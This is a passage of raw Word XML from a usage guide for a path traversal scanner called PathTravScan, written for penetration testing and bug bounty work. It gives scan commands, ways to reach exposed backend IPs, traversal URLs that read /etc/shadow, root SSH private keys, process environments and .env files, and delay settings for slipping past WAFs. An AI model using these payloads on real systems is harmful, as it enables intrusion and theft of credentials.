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b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">PathTravScan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="566573"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced Path Traversal Scanner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="2E86C1" w:sz="2"/>
          <w:bottom w:val="single" w:color="2E86C1" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete Usage Guide &amp; Pro Tips for Penetration Testing &amp; Bug Bounty</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="ABB2B9"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">v1.0.0  |  2025</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠  For Authorized Penetration Testing and Bug Bounty Programs Only  ⚠</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1A5276" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Installation &amp; Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1  Kali Linux / Parrot OS (Recommended Fix)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux uses an externally-managed Python environment. Never use pip system-wide — always use a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Step 1 — Create a virtual environment inside the project folder</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">python3 -m venv .venv</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Step 2 — Activate it (run this every time you open a new terminal)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">source .venv/bin/activate</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Step 3 — Install dependencies (no errors now)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pip install -r requirements.txt</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Step 4 — Run the tool</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">python pathtravscan.py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pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">💡 TIP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="81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pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Add an alias to your ~/.bashrc so activation is automatic:
alias pts='cd ~/PathTravScan &amp;&amp; source .venv/bin/activate &amp;&amp; python pathtravscan.py'</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1.2  Quick-Start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you want</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="636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r>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Interactive wizard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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python pathtravscan.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Quick scan (15 payloads)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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python pathtravscan.py -u URL -p /path -f /etc/passwd --mode quick</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Full scan (300+ payloads)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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python pathtravscan.py -u URL -p /path --mode full</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Route through Burp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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 --proxy http://127.0.0.1:8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Manual repeater</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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python pathtravscan.py repeater</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Generate payload list</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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python pathtravscan.py generate -p /path -f /etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Use custom wordlist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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 --wordlist wordlists/lfi_payloads.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A5276" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Core Pro Tips</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Tip 1 — Always Quick Scan First</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Start every engagement with --mode quick. It fires the 15 highest-confidence payloads and completes in seconds. If something fires, move to the repeater to explore manually. Only escalate to --mode full if quick returns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python pathtravscan.py \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -u https://target.com \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -p /SiteScope/htdocs/artwork \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -f /etc/passwd \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  --mode quick</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Tip 2 — Route Everything Through Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Even when using PathTravScan, send traffic through Burp Suite. You get a full HTTP history log, can modify requests mid-scan, replay specific payloads, and use Burp's Intruder on top of your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In Burp: Proxy → Options → Enable Intercept on/off as needed</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">python pathtravscan.py \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -u https://target.com -p /app/images \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  --mode full --proxy http://127.0.0.1:8080</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Tip 3 — Legacy TLS for Old Backend Servers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">If the main domain is down but a backend IP is exposed (found via Shodan or nslookup), that backend may only speak TLS 1.0 — which modern browsers reject. PathTravScan's legacy TLS mode bypasses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Find backend IP via nslookup or Shodan</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">nslookup target.com</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Test directly with legacy TLS ON (it's default)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">python pathtravscan.py \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -u https://BACKEND-IP \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -p /SiteScope/htdocs/artwork \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  --mode full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BB2B9" w:sz="1"/>
              <w:left w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:bottom w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:right w:val="single" w:color="ABB2B9" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9E7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D35400"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠ NOTE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:left w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:bottom w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:right w:val="single" w:color="ABB2B9" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9E7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">If HTTPS still fails, try http:// — many backend servers expose plaintext HTTP on port 80 with no TLS at all.</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Tip 4 — Use Repeater for Manual Expansion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the scanner confirms a working payload, switch to repeater mode. Manually test every sensitive file — don't stop at /etc/passwd.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python pathtravscan.py repeater</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Then manually test these URLs one by one:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># https://target.com/app/../../../../etc/shadow</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># https://target.com/app/../../../../root/.ssh/id_rsa</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># https://target.com/app/../../../../proc/self/environ</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># https://target.com/app/../../../../var/www/html/.env</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Tip 5 — Thread Count vs Stealth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Threads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Speed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="236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WAF Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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r>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Slow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2360"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:left w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:bottom w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:right w:val="single" w:color="ABB2B9" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EAFAF1"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Minimal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Bug bounty (stealthy)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Good</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="23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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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General pentest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Fast</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2360"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:left w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:bottom w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:right w:val="single" w:color="ABB2B9" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9E7"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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Internal networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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20+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Very fast</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="236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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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CTFs only</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Tip 6 — Delay for WAF Evasion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Many WAFs trigger on request rate, not payload content. A delay of 0.5–2 seconds between requests can bypass rate-based WAF rules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500ms delay — good balance for bug bounty targets</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">python pathtravscan.py -u https://target.com -p /app \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  --mode full --delay 0.5</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2s delay — maximum stealth for sensitive targets</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">python pathtravscan.py -u https://target.com -p /app \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  --mode full --delay 2 --threads 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A5276" w:sz="8"/>
        </w:pBdr>
